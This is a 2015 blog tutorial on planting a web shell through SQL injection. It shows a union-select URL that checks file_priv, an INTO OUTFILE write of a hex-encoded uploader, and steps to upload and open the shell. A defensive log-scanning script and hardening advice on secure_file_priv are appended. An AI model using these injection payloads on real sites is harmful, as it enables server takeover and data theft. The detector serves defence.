Friday, 12 June 2015
Uploading Shell Using SQL Injection
I think SQLi is fun, because we can do cool things with it: we can pop up an alert, inject HTML code, or even build a phishing page inside the SQL injection. That's awesome, right? This time I want to share "Uploading Shell Using SQL Injection". All you need is:
- You must have write privileges and a writable directory (where you will upload your shell)
- Root path (e.g. /var/www/website/ or C:\xampp\blablabla....)
- Magic Quotes must be enabled
How to check it?
group_concat(user,0x203a20,file_priv) from mysql.user
So our query will look like this:
http://localhost/sqli/vuln.php?id=-1 union select group_concat(user,0x203a20,file_priv) from mysql.user-- -
If it says Y after the current user, we have access. The next step is to write our uploader using the INTO OUTFILE syntax:
'our script in here' INTO OUTFILE "filepath"
You can see the uploader here: "Uploader". Then you can convert it into hex:
http://pastebin.com/PvmxDHTk (see the code here)
And then open it:
http://localhost/sqli/uploader.php
And we can see our uploader
Upload your shell..
And open your shell
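Seen from the defending side, both the file_priv check and the INTO OUTFILE write described above leave recognizable requests in the web server's access log. The detector below is an added example, not code from the original post; the rule names, the Apache-style log format and the sample lines (inert hex body, placeholder file name) are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Rule names are made up for this example; each maps to one step of the post.
RULES = {
    # Step 1: reading file_priv from mysql.user to see who may write files.
    "file_priv_probe": re.compile(r"\bfile_priv\b.*\bmysql\s*\.\s*user\b", re.I | re.S),
    # Step 2: SELECT ... INTO OUTFILE / DUMPFILE arriving in a request parameter.
    "into_outfile_write": re.compile(r"\binto\s+(?:out|dump)file\b", re.I),
    # The script body sent as one long hex literal (short ones such as 0x203a20 pass).
    "hex_payload": re.compile(r"\b0x[0-9a-f]{40,}\b", re.I),
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
}
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')

def normalize(query):
    """Undo up to two layers of URL encoding and collapse whitespace."""
    for _ in range(2):
        query = unquote_plus(query)
    return re.sub(r"\s+", " ", query)

def classify(log_line):
    """Return the sorted rule names that match the request's query string."""
    m = REQUEST.search(log_line)
    if m is None:
        return []
    query = normalize(urlsplit(m.group("target")).query)
    return sorted(name for name, rx in RULES.items() if rx.search(query))

def scan(lines):
    """Return (client_ip, hits) for every line with at least one hit."""
    return [(l.split()[0], h) for l in lines if (h := classify(l))]

# Constructed sample log: the hex body is 24 bytes of "A", the path a placeholder.
_HEX = "0x" + "41" * 24
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Jun/2015:10:01:02 +0700] "GET /sqli/vuln.php?id=3 HTTP/1.1" 200 512',
    '203.0.113.7 - - [12/Jun/2015:10:02:10 +0700] "GET /sqli/vuln.php?id=-1%20union%20select'
    '%20group_concat(user,0x203a20,file_priv)%20from%20mysql.user--%20- HTTP/1.1" 200 640',
    '203.0.113.7 - - [12/Jun/2015:10:03:44 +0700] "GET /sqli/vuln.php?id=-1+UNION+SELECT+'
    + _HEX + '+INTO+OUTFILE+%22/var/www/website/placeholder.php%22--+- HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for ip, hits in scan(SAMPLE_LOG):
        print(ip, hits)
```

The write step only works while the application's database account holds the FILE privilege; revoking it and setting MySQL's secure_file_priv to a directory outside the web root removes that precondition.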
# Thanks For You All :D